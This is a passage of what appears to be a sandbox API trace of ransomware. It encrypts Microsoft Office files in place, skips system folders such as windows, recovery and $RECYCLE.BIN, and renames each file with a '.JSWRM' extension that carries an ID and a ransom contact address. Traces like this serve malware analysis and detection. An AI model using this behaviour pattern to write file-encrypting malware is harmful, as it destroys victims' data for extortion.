office\\root\\office16\\pagesize\\pgmn110.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.446] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1f09a814, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1f09a814, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1f0c0a66, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x45792, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN111.XML", cAlternateFileName="")) returned 1 [0139.446] lstrcmpiW (lpString1="PGMN111.XML", lpString2=".") returned 1 [0139.446] lstrcmpiW (lpString1="PGMN111.XML", lpString2="..") returned 1 [0139.446] lstrcmpiW (lpString1="PGMN111.XML", lpString2="...") returned 1 [0139.446] lstrcmpiW (lpString1="PGMN111.XML", lpString2="windows") returned -1 [0139.446] lstrcmpiW (lpString1="PGMN111.XML", lpString2="recovery") returned -1 [0139.447] lstrcmpiW (lpString1="PGMN111.XML", lpString2="perflogs") returned 1 [0139.447] lstrcmpiW (lpString1="PGMN111.XML", lpString2="documents and settings") returned 1 [0139.447] lstrcmpiW (lpString1="PGMN111.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.447] lstrcmpiW (lpString1="PGMN111.XML", lpString2="system volume information") returned -1 [0139.447] lstrcmpiW (lpString1="PGMN111.XML", lpString2="msocache") returned 1 [0139.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN111.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN111.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN111.XML", lpUsedDefaultChar=0x0) returned 11 [0139.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN111.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN111.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN111.XML", lpUsedDefaultChar=0x0) returned 11 [0139.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.447] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN111.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn111.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.449] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=284562) returned 1 [0139.449] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.449] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0139.461] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.461] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0139.462] CloseHandle (hObject=0x238) returned 1 [0139.462] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN111.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn111.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN111.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn111.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.470] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1f09a814, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1f09a814, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1fc86400, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5a4e, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN114.XML", cAlternateFileName="")) returned 1 [0139.470] lstrcmpiW (lpString1="PGMN114.XML", lpString2=".") returned 1 [0139.470] lstrcmpiW (lpString1="PGMN114.XML", lpString2="..") returned 1 [0139.470] lstrcmpiW (lpString1="PGMN114.XML", lpString2="...") returned 1 [0139.470] lstrcmpiW (lpString1="PGMN114.XML", lpString2="windows") returned -1 [0139.470] lstrcmpiW (lpString1="PGMN114.XML", lpString2="recovery") returned -1 [0139.470] lstrcmpiW (lpString1="PGMN114.XML", lpString2="perflogs") returned 1 [0139.470] lstrcmpiW (lpString1="PGMN114.XML", lpString2="documents and settings") returned 1 [0139.470] lstrcmpiW (lpString1="PGMN114.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.470] lstrcmpiW (lpString1="PGMN114.XML", lpString2="system volume information") returned -1 [0139.470] lstrcmpiW (lpString1="PGMN114.XML", lpString2="msocache") returned 1 [0139.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN114.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN114.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN114.XML", lpUsedDefaultChar=0x0) returned 11 [0139.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN114.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN114.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN114.XML", lpUsedDefaultChar=0x0) returned 11 [0139.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.470] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN114.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn114.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.471] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=23118) returned 1 [0139.472] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.472] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5a40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x5a40, lpOverlapped=0x0) returned 1 [0139.474] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.474] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5a40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x5a40, lpOverlapped=0x0) returned 1 [0139.475] CloseHandle (hObject=0x238) returned 1 [0139.475] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN114.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn114.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN114.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn114.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.476] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1f0280f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1f0280f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1f09a814, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x23c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN120.XML", cAlternateFileName="")) returned 1 [0139.476] lstrcmpiW (lpString1="PGMN120.XML", lpString2=".") returned 1 [0139.476] lstrcmpiW (lpString1="PGMN120.XML", lpString2="..") returned 1 [0139.476] lstrcmpiW (lpString1="PGMN120.XML", lpString2="...") returned 1 [0139.476] lstrcmpiW (lpString1="PGMN120.XML", lpString2="windows") returned -1 [0139.476] lstrcmpiW (lpString1="PGMN120.XML", lpString2="recovery") returned -1 [0139.476] lstrcmpiW (lpString1="PGMN120.XML", lpString2="perflogs") returned 1 [0139.476] lstrcmpiW (lpString1="PGMN120.XML", lpString2="documents and settings") returned 1 [0139.476] lstrcmpiW (lpString1="PGMN120.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.476] lstrcmpiW (lpString1="PGMN120.XML", lpString2="system volume information") returned -1 [0139.476] lstrcmpiW (lpString1="PGMN120.XML", lpString2="msocache") returned 1 [0139.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN120.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN120.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN120.XML", lpUsedDefaultChar=0x0) returned 11 [0139.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN120.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN120.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN120.XML", lpUsedDefaultChar=0x0) returned 11 [0139.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.476] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN120.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn120.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.477] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=572) returned 1 [0139.477] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.477] ReadFile (in: hFile=0x238, lpBuffer=0x1ee6d0, nNumberOfBytesToRead=0x230, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x1ee6d0*, lpNumberOfBytesRead=0x345e89c*=0x230, lpOverlapped=0x0) returned 1 [0139.478] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.478] WriteFile (in: hFile=0x238, lpBuffer=0x1ee6d0*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x1ee6d0*, lpNumberOfBytesWritten=0x345e898*=0x230, lpOverlapped=0x0) returned 1 [0139.478] CloseHandle (hObject=0x238) returned 1 [0139.478] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN120.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn120.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN120.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn120.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.481] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc348b22, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc348b22, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdcfce125, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x943e, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PG_INDEX.XML", cAlternateFileName="")) returned 1 [0139.481] lstrcmpiW (lpString1="PG_INDEX.XML", lpString2=".") returned 1 [0139.481] lstrcmpiW (lpString1="PG_INDEX.XML", lpString2="..") returned 1 [0139.481] lstrcmpiW (lpString1="PG_INDEX.XML", lpString2="...") returned 1 [0139.481] lstrcmpiW (lpString1="PG_INDEX.XML", lpString2="windows") returned -1 [0139.481] lstrcmpiW (lpString1="PG_INDEX.XML", lpString2="recovery") returned -1 [0139.481] lstrcmpiW (lpString1="PG_INDEX.XML", lpString2="perflogs") returned 1 [0139.481] lstrcmpiW (lpString1="PG_INDEX.XML", lpString2="documents and settings") returned 1 [0139.481] lstrcmpiW (lpString1="PG_INDEX.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.481] lstrcmpiW (lpString1="PG_INDEX.XML", lpString2="system volume information") returned -1 [0139.481] lstrcmpiW (lpString1="PG_INDEX.XML", lpString2="msocache") returned 1 [0139.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PG_INDEX.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PG_INDEX.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PG_INDEX.XML", lpUsedDefaultChar=0x0) returned 12 [0139.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PG_INDEX.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PG_INDEX.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PG_INDEX.XML", lpUsedDefaultChar=0x0) returned 12 [0139.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PG_INDEX.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pg_index.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.483] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=37950) returned 1 [0139.483] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.483] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x9430, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x9430, lpOverlapped=0x0) returned 1 [0139.487] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.487] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x9430, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x9430, lpOverlapped=0x0) returned 1 [0139.487] CloseHandle (hObject=0x238) returned 1 [0139.487] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PG_INDEX.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pg_index.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PG_INDEX.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pg_index.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.488] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc348b22, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc348b22, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdcfce125, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x943e, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PG_INDEX.XML", cAlternateFileName="")) returned 0 [0139.488] FindClose (in: hFindFile=0x231ec0 | out: hFindFile=0x231ec0) returned 1 [0139.489] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1d791bfc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2169a085, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf2be48, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PDFREFLOW.EXE", cAlternateFileName="PDFREF~1.EXE")) returned 1 [0139.489] lstrcmpiW (lpString1="PDFREFLOW.EXE", lpString2=".") returned 1 [0139.489] lstrcmpiW (lpString1="PDFREFLOW.EXE", lpString2="..") returned 1 [0139.489] lstrcmpiW (lpString1="PDFREFLOW.EXE", lpString2="...") returned 1 [0139.489] lstrcmpiW (lpString1="PDFREFLOW.EXE", lpString2="windows") returned -1 [0139.489] lstrcmpiW (lpString1="PDFREFLOW.EXE", lpString2="recovery") returned -1 [0139.489] lstrcmpiW (lpString1="PDFREFLOW.EXE", lpString2="perflogs") returned -1 [0139.489] lstrcmpiW (lpString1="PDFREFLOW.EXE", lpString2="documents and settings") returned 1 [0139.489] lstrcmpiW (lpString1="PDFREFLOW.EXE", lpString2="$RECYCLE.BIN") returned 1 [0139.489] lstrcmpiW (lpString1="PDFREFLOW.EXE", lpString2="system volume information") returned -1 [0139.489] lstrcmpiW (lpString1="PDFREFLOW.EXE", lpString2="msocache") returned 1 [0139.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDFREFLOW.EXE", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0139.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDFREFLOW.EXE", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDFREFLOW.EXE", lpUsedDefaultChar=0x0) returned 13 [0139.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDFREFLOW.EXE", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0139.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDFREFLOW.EXE", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDFREFLOW.EXE", lpUsedDefaultChar=0x0) returned 13 [0139.489] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1db7a09, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1db7a09, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4f30656, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xdda50, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PE.DLL", cAlternateFileName="")) returned 1 [0139.489] lstrcmpiW (lpString1="PE.DLL", lpString2=".") returned 1 [0139.489] lstrcmpiW (lpString1="PE.DLL", lpString2="..") returned 1 [0139.489] lstrcmpiW (lpString1="PE.DLL", lpString2="...") returned 1 [0139.489] lstrcmpiW (lpString1="PE.DLL", lpString2="windows") returned -1 [0139.489] lstrcmpiW (lpString1="PE.DLL", lpString2="recovery") returned -1 [0139.489] lstrcmpiW (lpString1="PE.DLL", lpString2="perflogs") returned -1 [0139.489] lstrcmpiW (lpString1="PE.DLL", lpString2="documents and settings") returned 1 [0139.489] lstrcmpiW (lpString1="PE.DLL", lpString2="$RECYCLE.BIN") returned 1 [0139.489] lstrcmpiW (lpString1="PE.DLL", lpString2="system volume information") returned -1 [0139.489] lstrcmpiW (lpString1="PE.DLL", lpString2="msocache") returned 1 [0139.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE.DLL", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0139.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE.DLL", cchWideChar=6, lpMultiByteStr=0x345ef40, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE.DLL", lpUsedDefaultChar=0x0) returned 6 [0139.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE.DLL", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0139.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE.DLL", cchWideChar=6, lpMultiByteStr=0x345ef10, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE.DLL", lpUsedDefaultChar=0x0) returned 6 [0139.490] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8680a1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e4e8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PEOPLEDATAHANDLER.DLL", cAlternateFileName="PEOPLE~1.DLL")) returned 1 [0139.490] lstrcmpiW (lpString1="PEOPLEDATAHANDLER.DLL", lpString2=".") returned 1 [0139.490] lstrcmpiW (lpString1="PEOPLEDATAHANDLER.DLL", lpString2="..") returned 1 [0139.490] lstrcmpiW (lpString1="PEOPLEDATAHANDLER.DLL", lpString2="...") returned 1 [0139.490] lstrcmpiW (lpString1="PEOPLEDATAHANDLER.DLL", lpString2="windows") returned -1 [0139.490] lstrcmpiW (lpString1="PEOPLEDATAHANDLER.DLL", lpString2="recovery") returned -1 [0139.490] lstrcmpiW (lpString1="PEOPLEDATAHANDLER.DLL", lpString2="perflogs") 